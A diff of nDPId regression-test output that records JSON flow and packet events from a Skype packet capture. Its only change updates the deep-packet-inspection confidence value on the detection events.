@@ -971,17 +971,17 @@ 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2314,"source":"skype.pcap","alias":"nDPId-test","flow_id":235,"flow_packet_id":3,"flow_last_seen":1431969723864,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1431969723864,"pkt":"0NQSxnP1PBXCt3IOCABFAAAujeYAAEARD0nAqAEiTLnPDDLdsbUAGk80noICQMd2CkIbTJvr2m+0rjWR"} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2315,"source":"skype.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969723979,"flow_last_seen":1431969723979,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969723979,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63421,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2315,"source":"skype.pcap","alias":"nDPId-test","flow_id":267,"flow_packet_id":1,"flow_last_seen":1431969723979,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969723979,"pkt":"0NQSxnP1PBXCt3IOCABFAABLQV0AAEARtdHAqAEiwKgBAfe9ADUAN4CxqiYBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAABAAE="} 
-00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2315,"source":"skype.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969723979,"flow_last_seen":1431969723979,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969723979,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63421,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2315,"source":"skype.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969723979,"flow_last_seen":1431969723979,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969723979,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":63421,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2316,"source":"skype.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969723979,"flow_last_seen":1431969723979,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969723979,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":65037,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2316,"source":"skype.pcap","alias":"nDPId-test","flow_id":268,"flow_packet_id":1,"flow_last_seen":1431969723979,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969723979,"pkt":"0NQSxnP1PBXCt3IOCABFAABLuaAAAEARPY7AqAEiwKgBAf4NADUANx167A0BAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAAcAAE="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2316,"source":"skype.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969723979,"flow_last_seen":1431969723979,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969723979,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":65037,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2316,"source":"skype.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969723979,"flow_last_seen":1431969723979,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1431969723979,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":65037,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"},"dns": {"query":"pipe.prd.skypedata.akadns.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2320,"source":"skype.pcap","alias":"nDPId-test","flow_id":264,"flow_packet_id":3,"flow_last_seen":1431969724089,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969724089,"pkt":"0NQSxnP1PBXCt3IOCABFAABAyr4AAEARLHvAqAEiwKgBAc3qADUALN\/7ZhIBAAABAAAAAAAAAWIGY29uZmlnBXNreXBlA2NvbQAAAQAB"} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2321,"source":"skype.pcap","alias":"nDPId-test","flow_id":265,"flow_packet_id":3,"flow_last_seen":1431969724089,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969724089,"pkt":"0NQSxnP1PBXCt3IOCABFAABAk9AAAEARY2nAqAEiwKgBAcpaADUALFPq9ZgBAAABAAAAAAAAAWIGY29uZmlnBXNreXBlA2NvbQAAHAAB"} 
00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2329,"source":"skype.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969724570,"flow_last_seen":1431969724570,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969724570,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":50131,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2329,"source":"skype.pcap","alias":"nDPId-test","flow_id":269,"flow_packet_id":1,"flow_last_seen":1431969724570,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969724570,"pkt":"0NQSxnP1PBXCt3IOCABFAABAJs1AAEAGdVvAqAEi1KEIJMPTNFCYsmkqAAAAALAC\/\/+V\/gAAAgQFtAEDAwUBAQgKPiPKSgAAAAAEAgAA"} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2330,"source":"skype.pcap","alias":"nDPId-test","flow_id":269,"flow_packet_id":2,"flow_last_seen":1431969724644,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969724644,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADQGqCzUoQgkwKgBIjRQw9NEN1OLmLJpK6ASOJD4ewAAAgQFrAQCCAo\/mJ6PPiPKSgEDAwk="} 
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2331,"source":"skype.pcap","alias":"nDPId-test","flow_id":269,"flow_packet_id":3,"flow_last_seen":1431969724644,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969724644,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0kBRAAEAGDCDAqAEi1KEIJMPTNFCYsmkrRDdTjIAQECxPXAAAAQEICj4jypQ\/mJ6P"} -00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2339,"source":"skype.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431969724570,"flow_last_seen":1431969724719,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1459,"flow_avg_l4_payload_len":145,"midstream":0,"thread_ts_msec":1431969724719,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":50131,"dst_port":13392,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2339,"source":"skype.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1431969724570,"flow_last_seen":1431969724719,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1459,"flow_avg_l4_payload_len":145,"midstream":0,"thread_ts_msec":1431969724719,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"212.161.8.36","src_port":50131,"dst_port":13392,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": 
{"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2353,"source":"skype.pcap","alias":"nDPId-test","flow_id":267,"flow_packet_id":2,"flow_last_seen":1431969725034,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969725034,"pkt":"0NQSxnP1PBXCt3IOCABFAABLrvwAAEARSDLAqAEiwKgBAfe9ADUAN4CxqiYBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAABAAE="} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2354,"source":"skype.pcap","alias":"nDPId-test","flow_id":268,"flow_packet_id":2,"flow_last_seen":1431969725034,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969725034,"pkt":"0NQSxnP1PBXCt3IOCABFAABLUrMAAEARpHvAqAEiwKgBAf4NADUANx167A0BAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAAcAAE="} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2364,"source":"skype.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969725833,"flow_last_seen":1431969725833,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969725833,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":50132,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
@@ -990,29 +990,29 @@ 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2366,"source":"skype.pcap","alias":"nDPId-test","flow_id":270,"flow_packet_id":3,"flow_last_seen":1431969725886,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969725886,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0FRFAAEAGrszAqAEilQ0gD8PUNFDIS2mTZKVBg4AQECzp4QAAAQEICj4jz2Q\/guiR"} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2379,"source":"skype.pcap","alias":"nDPId-test","flow_id":267,"flow_packet_id":3,"flow_last_seen":1431969726134,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969726134,"pkt":"0NQSxnP1PBXCt3IOCABFAABLBEcAAEAR8ufAqAEiwKgBAfe9ADUAN4CxqiYBAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAABAAE="} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2380,"source":"skype.pcap","alias":"nDPId-test","flow_id":268,"flow_packet_id":3,"flow_last_seen":1431969726134,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1431969726134,"pkt":"0NQSxnP1PBXCt3IOCABFAABLzWEAAEARKc3AqAEiwKgBAf4NADUANx167A0BAAABAAAAAAAABHBpcGUDcHJkCXNreXBlZGF0YQZha2FkbnMDbmV0AAAcAAE="} 
-00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2401,"source":"skype.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969714165,"flow_last_seen":1431969726969,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":327,"flow_tot_l4_payload_len":368,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969726969,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":50111,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2401,"source":"skype.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969714165,"flow_last_seen":1431969726969,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":327,"flow_tot_l4_payload_len":368,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969726969,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":50111,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2410,"source":"skype.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969727446,"flow_last_seen":1431969727446,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969727446,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":50133,"dst_port":13392,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2410,"source":"skype.pcap","alias":"nDPId-test","flow_id":271,"flow_packet_id":1,"flow_last_seen":1431969727446,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969727446,"pkt":"0NQSxnP1PBXCt3IOCABFAABAw6JAAEAGAC\/AqAEilQ0gD8PVNFDxI3WvAAAAALAC\/\/9NiQAAAgQFtAEDAwUBAQgKPiPVcAAAAAAEAgAA"} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2412,"source":"skype.pcap","alias":"nDPId-test","flow_id":271,"flow_packet_id":2,"flow_last_seen":1431969727498,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969727498,"pkt":"PBXCt3IO0NQSxnP1CABFCAA8AABAADUGzs2VDSAPwKgBIjRQw9XOgDWr8SN1sKASOJC1wgAAAgQFrAQCCAo\/fSyFPiPVcAEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2413,"source":"skype.pcap","alias":"nDPId-test","flow_id":271,"flow_packet_id":3,"flow_last_seen":1431969727498,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969727498,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0a9FAAEAGWAzAqAEilQ0gD8PVNFDxI3WwzoA1rIAQECwMugAAAQEICj4j1aM\/fSyF"} 
-00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2424,"source":"skype.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1431969727446,"flow_last_seen":1431969727669,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1352,"flow_tot_l4_payload_len":1391,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1431969727669,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":50133,"dst_port":13392,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00768{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2424,"source":"skype.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1431969727446,"flow_last_seen":1431969727669,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1352,"flow_tot_l4_payload_len":1391,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1431969727669,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"149.13.32.15","src_port":50133,"dst_port":13392,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 
00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2451,"source":"skype.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":3,"flow_last_seen":1431969728511,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1431969728511,"pkt":"\/\/\/\/\/\/\/\/xCwDBkn+CABFAABIsLcAAEARRULAqAFcwKgB\/+EV4RUANFGUU3BvdFVkcDB5FYpWEIvHwwABAARIlcIDhMAbG8d8ZX7RWey9o+VAQ2IEJyw="} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2460,"source":"skype.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969728749,"flow_last_seen":1431969728749,"flow_idle_time":200000,"flow_min_l4_payload_len":499,"flow_max_l4_payload_len":499,"flow_tot_l4_payload_len":499,"flow_avg_l4_payload_len":499,"midstream":0,"thread_ts_msec":1431969728749,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"239.255.255.250","src_port":50084,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01110{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2460,"source":"skype.pcap","alias":"nDPId-test","flow_id":272,"flow_packet_id":1,"flow_last_seen":1431969728749,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":541,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":541,"pkt_l4_len":507,"thread_ts_msec":1431969728749,"pkt":"AQBef\/\/6xCwDBkn+CABFAAIPEXQAAAER9GvAqAFc7\/\/\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"} 
-00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2460,"source":"skype.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969728749,"flow_last_seen":1431969728749,"flow_idle_time":200000,"flow_min_l4_payload_len":499,"flow_max_l4_payload_len":499,"flow_tot_l4_payload_len":499,"flow_avg_l4_payload_len":499,"midstream":0,"thread_ts_msec":1431969728749,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"239.255.255.250","src_port":50084,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2460,"source":"skype.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969728749,"flow_last_seen":1431969728749,"flow_idle_time":200000,"flow_min_l4_payload_len":499,"flow_max_l4_payload_len":499,"flow_tot_l4_payload_len":499,"flow_avg_l4_payload_len":499,"midstream":0,"thread_ts_msec":1431969728749,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"239.255.255.250","src_port":50084,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 01106{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2461,"source":"skype.pcap","alias":"nDPId-test","flow_id":272,"flow_packet_id":2,"flow_last_seen":1431969728750,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":539,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":539,"pkt_l4_len":505,"thread_ts_msec":1431969728750,"pkt":"AQBef\/\/6xCwDBkn+CABFAAIN8CkAAAERFbjAqAFc7\/\/\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"} 
01023{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2462,"source":"skype.pcap","alias":"nDPId-test","flow_id":272,"flow_packet_id":3,"flow_last_seen":1431969728750,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":475,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":475,"pkt_l4_len":441,"thread_ts_msec":1431969728750,"pkt":"AQBef\/\/6xCwDBkn+CABFAAHN3wIAAAERJx\/AqAFc7\/\/\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"} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2528,"source":"skype.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969735255,"flow_last_seen":1431969735255,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969735255,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"106.188.249.186","src_port":13021,"dst_port":15120,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2528,"source":"skype.pcap","alias":"nDPId-test","flow_id":273,"flow_packet_id":1,"flow_last_seen":1431969735255,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":26,"thread_ts_msec":1431969735255,"pkt":"0NQSxnP1PBXCt3IOCABFAAAuQGgAAEARFBbAqAEiarz5ujLdOxAAGjrunqMCSv26L3gQtCJn9dl5F8Bv"} 
-00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2528,"source":"skype.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969735255,"flow_last_seen":1431969735255,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969735255,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"106.188.249.186","src_port":13021,"dst_port":15120,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2528,"source":"skype.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969735255,"flow_last_seen":1431969735255,"flow_idle_time":200000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969735255,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"106.188.249.186","src_port":13021,"dst_port":15120,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2580,"source":"skype.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1431969715510,"flow_last_seen":1431969745372,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2872,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1431969745372,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50117,"dst_port":18767,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2593,"source":"skype.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969745776,"flow_last_seen":1431969745776,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1431969745776,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":56886,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 